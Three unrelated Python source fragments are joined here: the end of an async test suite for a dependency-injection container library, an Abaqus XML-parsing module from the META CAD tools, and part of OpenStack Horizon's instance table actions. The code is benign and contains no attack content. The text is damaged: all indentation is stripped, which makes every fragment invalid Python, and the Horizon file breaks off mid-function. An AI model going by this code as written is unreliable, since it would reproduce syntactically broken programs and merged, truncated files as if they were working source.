async def init_resource():
raise Exception("Something went wrong")
class Container(containers.DeclarativeContainer):
resource_with_error = providers.Resource(init_resource)
client = providers.Factory(
Client,
resource1=resource_with_error,
resource2=None,
)
container = Container()
with raises(Exception, match="Something went wrong"):
await container.client()
@mark.asyncio
async def test_injection_runtime_error_async_provides():
async def create_client(*args, **kwargs):
raise Exception("Something went wrong")
class Container(BaseContainer):
client = providers.Factory(
create_client,
resource1=BaseContainer.resource1,
resource2=None,
)
container = Container()
with raises(Exception, match="Something went wrong"):
await container.client()
@mark.asyncio
async def test_injection_call_error_async_provides():
async def create_client(): # <-- no args defined
...
class Container(BaseContainer):
client = providers.Factory(
create_client,
resource1=BaseContainer.resource1,
resource2=None,
)
container = Container()
with raises(TypeError) as exception_info:
await container.client()
assert "create_client() got" in str(exception_info.value)
assert "unexpected keyword argument" in str(exception_info.value)
@mark.asyncio
async def test_attributes_injection():
class ContainerWithAttributes(BaseContainer):
client = providers.Factory(
Client,
BaseContainer.resource1,
resource2=None,
)
client.add_attributes(resource2=BaseContainer.resource2)
service = providers.Factory(
Service,
client=None,
)
service.add_attributes(client=client)
container = ContainerWithAttributes()
client1 = await container.client()
client2 = await container.client()
assert isinstance(client1, Client)
assert client1.resource1 is RESOURCE1
assert client1.resource2 is RESOURCE2
assert isinstance(client2, Client)
assert client2.resource1 is RESOURCE1
assert client2.resource2 is RESOURCE2
service1 = await container.service()
service2 = await container.service()
assert isinstance(service1, Service)
assert isinstance(service1.client, Client)
assert service1.client.resource1 is RESOURCE1
assert service1.client.resource2 is RESOURCE2
assert isinstance(service2, Service)
assert isinstance(service2.client, Client)
assert service2.client.resource1 is RESOURCE1
assert service2.client.resource2 is RESOURCE2
assert service1.client is not service2.client
@mark.asyncio
async def test_attributes_injection_attribute_error():
class ClientWithException(Client):
@property
def attribute_set_error(self):
return None
@attribute_set_error.setter
def attribute_set_error(self, value):
raise Exception("Something went wrong")
class Container(BaseContainer):
client = providers.Factory(
ClientWithException,
resource1=BaseContainer.resource1,
resource2=BaseContainer.resource2,
)
client.add_attributes(attribute_set_error=123)
container = Container()
with raises(Exception, match="Something went wrong"):
await container.client()
@mark.asyncio
async def test_attributes_injection_runtime_error():
async def init_resource():
raise Exception("Something went wrong")
class Container(containers.DeclarativeContainer):
resource = providers.Resource(init_resource)
client = providers.Factory(
Client,
resource1=None,
resource2=None,
)
client.add_attributes(resource1=resource)
client.add_attributes(resource2=resource)
container = Container()
with raises(Exception, match="Something went wrong"):
await container.client()
@mark.asyncio
async def test_async_instance_and_sync_attributes_injection():
class ContainerWithAttributes(BaseContainer):
resource1 = providers.Resource(init_resource, providers.Object(RESOURCE1))
client = providers.Factory(
Client,
BaseContainer.resource1,
resource2=None,
)
client.add_attributes(resource2=providers.Object(RESOURCE2))
service = providers.Factory(
Service,
client=None,
)
service.add_attributes(client=client)
container = ContainerWithAttributes()
client1 = await container.client()
client2 = await container.client()
assert isinstance(client1, Client)
assert client1.resource1 is RESOURCE1
assert client1.resource2 is RESOURCE2
assert isinstance(client2, Client)
assert client2.resource1 is RESOURCE1
assert client2.resource2 is RESOURCE2
service1 = await container.service()
service2 = await container.service()
assert isinstance(service1, Service)
assert isinstance(service1.client, Client)
assert service1.client.resource1 is RESOURCE1
assert service1.client.resource2 is RESOURCE2
assert isinstance(service2, Service)
assert isinstance(service2.client, Client)
assert service2.client.resource1 is RESOURCE1
assert service2.client.resource2 is RESOURCE2
assert service1.client is not service2.client
| |
# Copyright (C) 2013-2015 MetaMorph Software, Inc
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this data, including any software or models in source or binary
# form, as well as any drawings, specifications, and documentation
# (collectively "the Data"), to deal in the Data without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Data, and to
# permit persons to whom the Data is furnished to do so, subject to the
# following conditions:
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Data.
# THE DATA IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS, SPONSORS, DEVELOPERS, CONTRIBUTORS, OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE DATA OR THE USE OR OTHER DEALINGS IN THE DATA.
# =======================
# This version of the META tools is a fork of an original version produced
# by Vanderbilt University's Institute for Software Integrated Systems (ISIS).
# Their license statement:
# Copyright (C) 2011-2014 Vanderbilt University
# Developed with the sponsorship of the Defense Advanced Research Projects
# Agency (DARPA) and delivered to the U.S. Government with Unlimited Rights
# as defined in DFARS 252.227-7013.
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this data, including any software or models in source or binary
# form, as well as any drawings, specifications, and documentation
# (collectively "the Data"), to deal in the Data without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Data, and to
# permit persons to whom the Data is furnished to do so, subject to the
# following conditions:
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Data.
# THE DATA IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS, SPONSORS, DEVELOPERS, CONTRIBUTORS, OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE DATA OR THE USE OR OTHER DEALINGS IN THE DATA.
"""
AbaqusParse.py, version 1.4.0
For use with Abaqus 6.13-1 (Python 2.6.2).
Created by Ozgur Yapar <oyapar@isis.vanderbilt.edu>
Robert Boyles <rboyles@isis.vanderbilt.edu>
- Includes modules which parse the XML files generated by CyPhy
and Create Assembly program to get the essential data which
contains user inputs and CAD data.
"""
from abaqus import *
from abaqusConstants import *
import os, re
from numpy import array, cross, transpose, vstack, dot
import numpy.linalg as LA
import string as STR
import xml.etree.ElementTree as ET
import _winreg, sys, ctypes, uuid, traceback
import logging
def parseMaterialLibrary():
with _winreg.OpenKey(_winreg.HKEY_LOCAL_MACHINE, r'Software\META', 0, _winreg.KEY_READ | _winreg.KEY_WOW64_32KEY) as key:
META_PATH = _winreg.QueryValueEx(key, 'META_PATH')[0]
MATERIALLIBINTERFACEPATH = os.path.join(META_PATH, "bin", "Python27", "Lib", "site-packages")
sys.path.insert(0, MATERIALLIBINTERFACEPATH)
from MaterialLibraryInterface import LibraryManager
PATH = ctypes.c_wchar_p(chr(0x00) * 256)
FOLDERID_DOCUMENTS = ctypes.c_char_p(uuid.UUID("ED4824AF-DCE4-45A8-81E2-FC7965083634").bytes_le)
ctypes.windll.shell32.SHGetKnownFolderPath(FOLDERID_DOCUMENTS, 0, None, ctypes.byref(PATH))
MATERIALLIBPATH = os.path.join(PATH.value, "META Documents", "MaterialLibrary", "material_library.json")
return LibraryManager(MATERIALLIBPATH)
def parseCADAssemblyXML(args):
logger = logging.getLogger()
logger.info("XML parser is obtaining necessary data from CyPhy assembly XML \n") #XML parser obtains necessary data from CyPhy
xmlName = 'CADAssembly.XML'
xmlPath = os.path.join(os.getcwd(), xmlName)
try:
tree = ET.parse(xmlPath)
xmlRoot = tree.getroot()
except:
logger.error(STR.join(traceback.format_exception(*sys.exc_info())))
logger.error('Cannot parse CADAssembly.xml.\n')
raise
try:
assemblyXML = xmlRoot.find('Assembly')
except:
logger.error(STR.join(traceback.format_exception(*sys.exc_info())))
logger.error('Cannot find the block /"Assembly/" in CADAssembly.xml.\n')
raise
try:
analysesXML = assemblyXML.find('Analyses')
except:
logger.error(STR.join(traceback.format_exception(*sys.exc_info())))
logger.error('Cannot find the block /"Analyses/" in CADAssembly.xml.\n')
raise
try:
cadAssemblyXML = assemblyXML.find('CADComponent')
except:
logger.error(STR.join(traceback.format_exception(*sys.exc_info())))
logger.error('Cannot find the block /"CADComponent/" in CADAssembly.xml.\n')
raise
try:
feaXML = analysesXML.find('FEA')
except:
logger.error(STR.join(traceback.format_exception(*sys.exc_info())))
logger.error('Cannot find the block /"FEA/" in CADAssembly.xml.\n')
raise
try:
metricSetXML = feaXML.getiterator('Metric')
except:
logger.error(STR.join(traceback.format_exception(*sys.exc_info())))
logger.error('Cannot find \"Metric\" inside the block FEA in CADAssembly.xml.\n')
raise
# Determine if a thermal analysis is to be included.
thermalSetXML = feaXML.find('ThermalElements')
try:
metricsSetXML = feaXML.find('Metrics')
except:
logger.error(STR.join(traceback.format_exception(*sys.exc_info())))
logger.error('Cannot find \"Metrics\" inside the block \"FEA\" in CADAssembly.xml.\n')
raise
try:
metricsComponentSetXML = metricsSetXML.findall('Metric')
except:
metricsComponentSetXML = 'null'
pass
try:
maxNumberIter = int(feaXML.get("MaxAdaptiveIterations"))
if maxNumberIter > 10:
maxNumberIter = 10
logger.info('MaxIterations greater than maximum of 10. Setting MaxIterations to 10. \n')
elif maxNumberIter <= 0:
maxNumberIter = 1
logger.info('MaxIterations less than minimum of 0. Setting MaxIterations to 1. \n')
except Exception as e:
logger.error(STR.join(traceback.format_exception(*sys.exc_info())))
logger.error('Error in reading maximum number of iterations from CADAssembly.xml file.\n')
raise
analysisConstraintSetXML = None
if not args.meshOnly:
try:
analysisConstraintsXML = feaXML.find('AnalysisConstraints')
# If None, could be a thermal only analysis
if analysisConstraintsXML is not None:
analysisConstraintSetXML = analysisConstraintsXML.getiterator('AnalysisConstraint')
except:
logger.error(STR.join(traceback.format_exception(*sys.exc_info())))
logger.error('The model has not been constrained properly. This may cause rigid body motion during regular FEA analysis.\n')
raise
logger.info('Successfully parsed all required data from CADAssembly.XML \n')
logger.info("**********************************************************************************" + '\n')
return (xmlName, feaXML, cadAssemblyXML, metricSetXML, metricsSetXML,
metricsComponentSetXML, maxNumberIter, analysisConstraintSetXML,
thermalSetXML)
def parseStep(cadAssemblyXML):
logger = logging.getLogger()
logger.info("Defining the path for the STEP file" + '\n')
try:
if cadAssemblyXML.get("Type") == "ASSEMBLY":
testBenchName = cadAssemblyXML.get("Name")
stepName = testBenchName + '_asm.stp'
stepPath = os.path.join(os.getcwd(), 'AP203_E2_SINGLE_FILE', stepName)
step = mdb.openStep(fileName=stepPath)
except Exception as e:
logger.error(STR.join(traceback.format_exception(*sys.exc_info())))
logger.error('Error during finding and opening the step file\n')
raise
logger.info("Opening the STEP file " + str(stepName) + ' and converting it into raw data' + '\n')
logger.info("**********************************************************************************" + '\n')
return (stepPath, testBenchName, step)
def parseCADAssemblyMetricsXML(runAdams):
logger = logging.getLogger()
logger.info("XML parser is obtaining necessary data from Create Assemby program" + '\n')
xmlMetricsName = 'CADAssembly_metrics.xml'
xmlMetricsPath = os.path.join(os.getcwd(), xmlMetricsName)
try:
treeMetrics = ET.parse(xmlMetricsPath)
xmlMetricsRoot = treeMetrics.getroot()
except:
logger.error(STR.join(traceback.format_exception(*sys.exc_info())))
logger.error('Cannot parse CADAssembly_metrics.xml.\n')
raise
try:
metricComponentsXML = xmlMetricsRoot.find('MetricComponents')
except:
logger.error(STR.join(traceback.format_exception(*sys.exc_info())))
logger.error('Cannot find the block /"MetricComponents/" in CADAssembly_metrics.xml.\n')
raise
try:
metricComponentXML = metricComponentsXML.findall('MetricComponent')
except:
logger.error(STR.join(traceback.format_exception(*sys.exc_info())))
logger.error('Cannot find the block /"MetricComponent/" in CADAssembly_metrics.xml.\n')
raise
try:
metricAssembliesXML = xmlMetricsRoot.find('Assemblies')
except:
logger.error(STR.join(traceback.format_exception(*sys.exc_info())))
logger.error('Cannot find the block /"Assemblies/" in CADAssembly_metrics.xml.\n')
raise
try:
metricAssemblyXML = metricAssembliesXML.find('Assembly')
except:
logger.error(STR.join(traceback.format_exception(*sys.exc_info())))
logger.error('Cannot find the block /"Assembly/" in CADAssembly_metrics.xml.\n')
raise
try:
metricCADComponentsXML = metricAssemblyXML.find('CADComponent')
except:
logger.error(STR.join(traceback.format_exception(*sys.exc_info())))
logger.error('Cannot find the block /"CADComponent/" in CADAssembly_metrics.xml.\n')
raise
try:
jointsXML = xmlMetricsRoot.find('Joints')
except:
if runAdams: # required for ADAMS runs, not necessarily for standalone
logger.error(STR.join(traceback.format_exception(*sys.exc_info())))
logger.error('Cannot find the block /"Joints/" in CADAssembly_metrics.xml.\n')
raise
else:
jointsXML = None
logger.info('Successfully parsed all required data from CADAssemblyMetrics.XML \n')
logger.info("**********************************************************************************" + '\n')
return (xmlMetricsName, metricComponentsXML, metricComponentXML,
metricAssembliesXML, metricAssemblyXML, metricCADComponentsXML, jointsXML)
def parseKinComputedValuesXML():
logger = logging.getLogger()
logger.info("XML parser is obtaining necessary data from Adams" + '\n')
xmlCompName = 'kinComputedValues.xml'
xmlCompPath = os.path.join(os.getcwd(), xmlCompName)
try:
treeComp = ET.parse(xmlCompPath)
xmlCompRoot = treeComp.getroot()
except:
logger.error(STR.join(traceback.format_exception(*sys.exc_info())))
logger.error('Cannot parse ComputedValues.xml.\n')
raise
try:
ComputedComponentXML = xmlCompRoot.findall('Component')
except:
logger.error(STR.join(traceback.format_exception(*sys.exc_info())))
logger.error('Cannot find \"Components\" block inside the ComputedValues.xml file.\n')
raise
try:
for element in ComputedComponentXML:
compMetrics = element.find('Metrics')
compMetric = compMetrics.find('Metric')
try:
compMetricID = compMetric.get('MetricID')
except AttributeError:
continue
if compMetricID == 'Anchor':
anchorID = element.get('ComponentInstanceID')
anchorPoint = compMetric.get('ArrayValue')
except:
logger.error(STR.join(traceback.format_exception(*sys.exc_info())))
logger.error('Cannot find anchored part name inside the ComputedValues.xml file.\n')
raise
logger.info('Successfully parsed all required data from kinComputedValues.XML \n')
logger.info("**********************************************************************************" + '\n')
return (anchorID, anchorPoint)
def parseInpTemp(inpTempFile): # Determine upto which point the temporary INP file needs to be merged...
# ...with the final INP file
m=1
for eachLine in inpTempFile: # Loop through each line of the temporary INP file
loadData = eachLine.split() # Split each line to thier words
try:
if loadData[1] == 'STEP:': # If the second word in that line is STEP:
stopLine = m-1 # Store the number of the previous line as the stopLine
except:
pass
m+=1
return stopLine
def parseLOD(lodFile): # Determine from which point the LOD file generated by Adams needs...
# ...to be merged with the final INP file
j=1
for eachLine in lodFile: # Loop through each line of the LOD file
loadData = eachLine.split() # Split each line to thier words
try:
if loadData[2] == 'CASE': # If the third word in that line is CASE
startLine = j # Store the number of that line as the startLine
break
except:
pass
j+=1
return startLine
| |
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
from django.conf import settings
from django.http import HttpResponse
from django import template
from django.template.defaultfilters import title
from django import urls
from django.utils.http import urlencode
from django.utils.safestring import mark_safe
from django.utils.translation import npgettext_lazy
from django.utils.translation import pgettext_lazy
from django.utils.translation import string_concat
from django.utils.translation import ugettext_lazy as _
from django.utils.translation import ungettext_lazy
import netaddr
from horizon import exceptions
from horizon import messages
from horizon import tables
from horizon.templatetags import sizeformat
from horizon.utils import filters
from openstack_dashboard import api
from openstack_dashboard.dashboards.project.floating_ips import workflows
from openstack_dashboard.dashboards.project.instances import tabs
from openstack_dashboard.dashboards.project.instances.workflows \
import resize_instance
from openstack_dashboard.dashboards.project.instances.workflows \
import update_instance
from openstack_dashboard import policy
from openstack_dashboard.views import get_url_with_pagination
LOG = logging.getLogger(__name__)
ACTIVE_STATES = ("ACTIVE",)
VOLUME_ATTACH_READY_STATES = ("ACTIVE", "SHUTOFF")
SNAPSHOT_READY_STATES = ("ACTIVE", "SHUTOFF", "PAUSED", "SUSPENDED")
SHELVE_READY_STATES = ("ACTIVE", "SHUTOFF", "PAUSED", "SUSPENDED")
POWER_STATES = {
0: "NO STATE",
1: "RUNNING",
2: "BLOCKED",
3: "PAUSED",
4: "SHUTDOWN",
5: "SHUTOFF",
6: "CRASHED",
7: "SUSPENDED",
8: "FAILED",
9: "BUILDING",
}
PAUSE = 0
UNPAUSE = 1
SUSPEND = 0
RESUME = 1
SHELVE = 0
UNSHELVE = 1
def is_deleting(instance):
task_state = getattr(instance, "OS-EXT-STS:task_state", None)
if not task_state:
return False
return task_state.lower() == "deleting"
class DeleteInstance(policy.PolicyTargetMixin, tables.DeleteAction):
policy_rules = (("compute", "os_compute_api:servers:delete"),)
help_text = _("Deleted instances are not recoverable.")
default_message_level = "info"
@staticmethod
def action_present(count):
return ungettext_lazy(
u"Delete Instance",
u"Delete Instances",
count
)
@staticmethod
def action_past(count):
return ungettext_lazy(
u"Scheduled deletion of Instance",
u"Scheduled deletion of Instances",
count
)
def allowed(self, request, instance=None):
error_state = False
if instance:
error_state = (instance.status == 'ERROR')
return error_state or not is_deleting(instance)
def action(self, request, obj_id):
api.nova.server_delete(request, obj_id)
class RebootInstance(policy.PolicyTargetMixin, tables.BatchAction):
name = "reboot"
classes = ('btn-reboot',)
policy_rules = (("compute", "os_compute_api:servers:reboot"),)
help_text = _("Restarted instances will lose any data"
" not saved in persistent storage.")
action_type = "danger"
@staticmethod
def action_present(count):
return ungettext_lazy(
u"Hard Reboot Instance",
u"Hard Reboot Instances",
count
)
@staticmethod
def action_past(count):
return ungettext_lazy(
u"Hard Rebooted Instance",
u"Hard Rebooted Instances",
count
)
def allowed(self, request, instance=None):
if instance is not None:
return ((instance.status in ACTIVE_STATES or
instance.status == 'SHUTOFF') and
not is_deleting(instance))
else:
return True
def action(self, request, obj_id):
api.nova.server_reboot(request, obj_id, soft_reboot=False)
class SoftRebootInstance(RebootInstance):
name = "soft_reboot"
@staticmethod
def action_present(count):
return ungettext_lazy(
u"Soft Reboot Instance",
u"Soft Reboot Instances",
count
)
@staticmethod
def action_past(count):
return ungettext_lazy(
u"Soft Rebooted Instance",
u"Soft Rebooted Instances",
count
)
def action(self, request, obj_id):
api.nova.server_reboot(request, obj_id, soft_reboot=True)
def allowed(self, request, instance=None):
if instance is not None:
return instance.status in ACTIVE_STATES
else:
return True
class RescueInstance(policy.PolicyTargetMixin, tables.LinkAction):
name = "rescue"
verbose_name = _("Rescue Instance")
classes = ("btn-rescue", "ajax-modal")
url = "horizon:project:instances:rescue"
def get_link_url(self, datum):
instance_id = self.table.get_object_id(datum)
return urls.reverse(self.url, args=[instance_id])
def allowed(self, request, instance):
return instance.status in ACTIVE_STATES
class UnRescueInstance(tables.BatchAction):
name = 'unrescue'
classes = ("btn-unrescue",)
@staticmethod
def action_present(count):
return ungettext_lazy(
u"Unrescue Instance",
u"Unrescue Instances",
count
)
@staticmethod
def action_past(count):
return ungettext_lazy(
u"Unrescued Instance",
u"Unrescued Instances",
count
)
def action(self, request, obj_id):
api.nova.server_unrescue(request, obj_id)
def allowed(self, request, instance=None):
if instance:
return instance.status == "RESCUE"
return False
class TogglePause(tables.BatchAction):
name = "pause"
icon = "pause"
@staticmethod
def action_present(count):
return (
ungettext_lazy(
u"Pause Instance",
u"Pause Instances",
count
),
ungettext_lazy(
u"Resume Instance",
u"Resume Instances",
count
),
)
@staticmethod
def action_past(count):
return (
ungettext_lazy(
u"Paused Instance",
u"Paused Instances",
count
),
ungettext_lazy(
u"Resumed Instance",
u"Resumed Instances",
count
),
)
def allowed(self, request, instance=None):
if not api.nova.extension_supported('AdminActions',
request):
return False
if not instance:
return False
self.paused = instance.status == "PAUSED"
if self.paused:
self.current_present_action = UNPAUSE
policy_rules = (
("compute", "os_compute_api:os-pause-server:unpause"),)
else:
self.current_present_action = PAUSE
policy_rules = (
("compute", "os_compute_api:os-pause-server:pause"),)
has_permission = policy.check(
policy_rules, request,
target={'project_id': getattr(instance, 'tenant_id', None)})
return (has_permission and
(instance.status in ACTIVE_STATES or self.paused) and
not is_deleting(instance))
def action(self, request, obj_id):
if self.paused:
api.nova.server_unpause(request, obj_id)
self.current_past_action = UNPAUSE
else:
api.nova.server_pause(request, obj_id)
self.current_past_action = PAUSE
class ToggleSuspend(tables.BatchAction):
name = "suspend"
classes = ("btn-suspend",)
@staticmethod
def action_present(count):
return (
ungettext_lazy(
u"Suspend Instance",
u"Suspend Instances",
count
),
ungettext_lazy(
u"Resume Instance",
u"Resume Instances",
count
),
)
@staticmethod
def action_past(count):
return (
ungettext_lazy(
u"Suspended Instance",
u"Suspended Instances",
count
),
ungettext_lazy(
u"Resumed Instance",
u"Resumed Instances",
count
),
)
def allowed(self, request, instance=None):
if not api.nova.extension_supported('AdminActions',
request):
return False
if not instance:
return False
self.suspended = instance.status == "SUSPENDED"
if self.suspended:
self.current_present_action = RESUME
policy_rules = (
("compute", "os_compute_api:os-rescue"),)
else:
self.current_present_action = SUSPEND
policy_rules = (
("compute", "os_compute_api:os-suspend-server:suspend"),)
has_permission = policy.check(
policy_rules, request,
target={'project_id': getattr(instance, 'tenant_id', None)})
return (has_permission and
(instance.status in ACTIVE_STATES or self.suspended) and
not is_deleting(instance))
def action(self, request, obj_id):
if self.suspended:
api.nova.server_resume(request, obj_id)
self.current_past_action = RESUME
else:
api.nova.server_suspend(request, obj_id)
self.current_past_action = SUSPEND
class ToggleShelve(tables.BatchAction):
name = "shelve"
icon = "shelve"
@staticmethod
def action_present(count):
return (
ungettext_lazy(
u"Shelve Instance",
u"Shelve Instances",
count
),
ungettext_lazy(
u"Unshelve Instance",
u"Unshelve Instances",
count
),
)
@staticmethod
def action_past(count):
return (
ungettext_lazy(
u"Shelved Instance",
u"Shelved Instances",
count
),
ungettext_lazy(
u"Unshelved Instance",
u"Unshelved Instances",
count
),
)
def allowed(self, request, instance=None):
if not api.nova.extension_supported('Shelve', request):
return False
if not instance:
return False
if not request.user.is_superuser and getattr(
instance, 'locked', False):
return False
self.shelved = instance.status == "SHELVED_OFFLOADED"
if self.shelved:
self.current_present_action = UNSHELVE
policy_rules = (("compute", "os_compute_api:os-shelve:unshelve"),)
else:
self.current_present_action = SHELVE
policy_rules = (("compute", "os_compute_api:os-shelve:shelve"),)
has_permission = policy.check(
policy_rules, request,
target={'project_id': getattr(instance, 'tenant_id', None)})
return (has_permission and
(instance.status in SHELVE_READY_STATES or self.shelved) and
not is_deleting(instance))
def action(self, request, obj_id):
if self.shelved:
api.nova.server_unshelve(request, obj_id)
self.current_past_action = UNSHELVE
else:
api.nova.server_shelve(request, obj_id)
self.current_past_action = SHELVE
class LaunchLink(tables.LinkAction):
name = "launch"
verbose_name = _("Launch Instance")
url = "horizon:project:instances:launch"
classes = ("ajax-modal", "btn-launch")
icon = "cloud-upload"
policy_rules = (("compute", "os_compute_api:servers:create"),)
ajax = True
def __init__(self, attrs=None, **kwargs):
kwargs['preempt'] = True
super(LaunchLink, self).__init__(attrs, **kwargs)
def allowed(self, request, datum):
try:
limits = api.nova.tenant_absolute_limits(request, reserved=True)
instances_available = limits['maxTotalInstances'] \
- limits['totalInstancesUsed']
cores_available = limits['maxTotalCores'] \
- limits['totalCoresUsed']
ram_available = limits['maxTotalRAMSize'] - limits['totalRAMUsed']
if instances_available <= 0 or cores_available <= 0 \
or ram_available <= 0:
if "disabled" not in self.classes:
self.classes = [c for c in self.classes] + ['disabled']
self.verbose_name = string_concat(self.verbose_name, ' ',
_("(Quota exceeded)"))
else:
self.verbose_name = _("Launch Instance")
classes = [c for c in self.classes if c != "disabled"]
self.classes = classes
except Exception:
LOG.exception("Failed to retrieve quota information")
# If we can't get the quota information, leave it to the
# API to check when launching
return True # The action should always be displayed
def single(self, table, request, object_id=None):
self.allowed(request, None)
return HttpResponse(self.render(is_table_action=True))
class LaunchLinkNG(LaunchLink):
name = "launch-ng"
url = "horizon:project:instances:index"
ajax = False
classes = ("btn-launch", )
def get_default_attrs(self):
url = urls.reverse(self.url)
ngclick = "modal.openLaunchInstanceWizard(" \
"{ successUrl: '%s' })" % url
self.attrs.update({
'ng-controller': 'LaunchInstanceModalController as modal',
'ng-click': ngclick
})
return super(LaunchLinkNG, self).get_default_attrs()
def get_link_url(self, datum=None):
return "javascript:void(0);"
class EditInstance(policy.PolicyTargetMixin, tables.LinkAction):
name = "edit"
verbose_name = _("Edit Instance")
url = "horizon:project:instances:update"
classes = ("ajax-modal",)
icon = "pencil"
policy_rules = (("compute", "os_compute_api:servers:update"),)
def get_link_url(self, project):
return self._get_link_url(project, 'instance_info')
def _get_link_url(self, project, step_slug):
base_url = urls.reverse(self.url, args=[project.id])
next_url = self.table.get_full_url()
params = {"step": step_slug,
update_instance.UpdateInstance.redirect_param_name: next_url}
param = urlencode(params)
return "?".join([base_url, param])
def allowed(self, request, instance):
return not is_deleting(instance)
class EditInstanceSecurityGroups(EditInstance):
name = "edit_secgroups"
verbose_name = _("Edit Security Groups")
def get_link_url(self, project):
return self._get_link_url(project, 'update_security_groups')
def allowed(self, request, instance=None):
if not api.base.is_service_enabled(request, 'network'):
return False
return (instance.status in ACTIVE_STATES and
not is_deleting(instance) and
request.user.tenant_id == instance.tenant_id)
class EditPortSecurityGroups(tables.LinkAction):
name = "edit_port_secgroups"
verbose_name = _("Edit Port Security Groups")
url = "horizon:project:instances:detail"
icon = "pencil"
def get_link_url(self, instance):
base_url = urls.reverse(self.url, args=[instance.id])
return '%s?tab=%s__%s' % (base_url, 'instance_details', 'interfaces')
class CreateSnapshot(policy.PolicyTargetMixin, tables.LinkAction):
name = "snapshot"
verbose_name = _("Create Snapshot")
url = "horizon:project:images:snapshots:create"
classes = ("ajax-modal",)
icon = "camera"
policy_rules = (("compute", "os_compute_api:snapshot"),)
def allowed(self, request, instance=None):
return instance.status in SNAPSHOT_READY_STATES \
and not is_deleting(instance)
class ConsoleLink(policy.PolicyTargetMixin, tables.LinkAction):
name = "console"
verbose_name = _("Console")
url = "horizon:project:instances:detail"
classes = ("btn-console",)
policy_rules = (("compute", "os_compute_api:os-consoles:index"),)
def allowed(self, request, instance=None):
# We check if ConsoleLink is allowed only if settings.CONSOLE_TYPE is
# not set at all, or if it's set to any value other than None or False.
return bool(getattr(settings, 'CONSOLE_TYPE', True)) and \
instance.status in ACTIVE_STATES and not is_deleting(instance)
def get_link_url(self, datum):
base_url = super(ConsoleLink, self).get_link_url(datum)
tab_query_string = tabs.ConsoleTab(
tabs.InstanceDetailTabs).get_query_string()
return "?".join([base_url, tab_query_string])
class LogLink(policy.PolicyTargetMixin, tables.LinkAction):
name = "log"
verbose_name = _("View Log")
url = "horizon:project:instances:detail"
classes = ("btn-log",)
policy_rules = (("compute", "os_compute_api:os-console-output"),)
def allowed(self, request, instance=None):
return instance.status in ACTIVE_STATES and not is_deleting(instance)
def get_link_url(self, datum):
base_url = super(LogLink, self).get_link_url(datum)
tab_query_string = tabs.LogTab(
tabs.InstanceDetailTabs).get_query_string()
return "?".join([base_url, tab_query_string])
class ResizeLink(policy.PolicyTargetMixin, tables.LinkAction):
name = "resize"
verbose_name = _("Resize Instance")
url = "horizon:project:instances:resize"
classes = ("ajax-modal", "btn-resize")
policy_rules = (("compute", "os_compute_api:servers:resize"),)
action_type = "danger"
def get_link_url(self, project):
return self._get_link_url(project, 'flavor_choice')
def _get_link_url(self, project, step_slug):
base_url = urls.reverse(self.url, args=[project.id])
next_url = self.table.get_full_url()
params = {"step": step_slug,
resize_instance.ResizeInstance.redirect_param_name: next_url}
param = urlencode(params)
return "?".join([base_url, param])
def allowed(self, request, instance):
return ((instance.status in ACTIVE_STATES or
instance.status == 'SHUTOFF') and
not is_deleting(instance))
class ConfirmResize(policy.PolicyTargetMixin, tables.Action):
name = "confirm"
verbose_name = _("Confirm Resize/Migrate")
classes = ("btn-confirm", "btn-action-required")
policy_rules = (("compute", "os_compute_api:servers:confirm_resize"),)
def allowed(self, request, instance):
return instance.status == 'VERIFY_RESIZE'
def single(self, table, request, instance):
api.nova.server_confirm_resize(request, instance)
class RevertResize(policy.PolicyTargetMixin, tables.Action):
name = "revert"
verbose_name = _("Revert Resize/Migrate")
classes = ("btn-revert", "btn-action-required")
policy_rules = (("compute", "os_compute_api:servers:revert_resize"),)
def allowed(self, request, instance):
return instance.status == 'VERIFY_RESIZE'
def single(self, table, request, instance):
api.nova.server_revert_resize(request, instance)
class RebuildInstance(policy.PolicyTargetMixin, tables.LinkAction):
name = "rebuild"
verbose_name = _("Rebuild Instance")
classes = ("btn-rebuild", "ajax-modal")
url = "horizon:project:instances:rebuild"
policy_rules = (("compute", "os_compute_api:servers:rebuild"),)
action_type = "danger"
def allowed(self, request, instance):
return ((instance.status in ACTIVE_STATES or
instance.status == 'SHUTOFF') and
not is_deleting(instance))
def get_link_url(self, datum):
instance_id = self.table.get_object_id(datum)
return urls.reverse(self.url, args=[instance_id])
class DecryptInstancePassword(tables.LinkAction):
name = "decryptpassword"
verbose_name = _("Retrieve Password")
classes = ("btn-decrypt", "ajax-modal")
url = "horizon:project:instances:decryptpassword"
def allowed(self, request, instance):
enable = getattr(settings,
'OPENSTACK_ENABLE_PASSWORD_RETRIEVE',
False)
return (enable and
(instance.status in ACTIVE_STATES or
instance.status == 'SHUTOFF') and
not is_deleting(instance) and
get_keyname(instance) is not None)
def get_link_url(self, datum):
instance_id = self.table.get_object_id(datum)
keypair_name = get_keyname(datum)
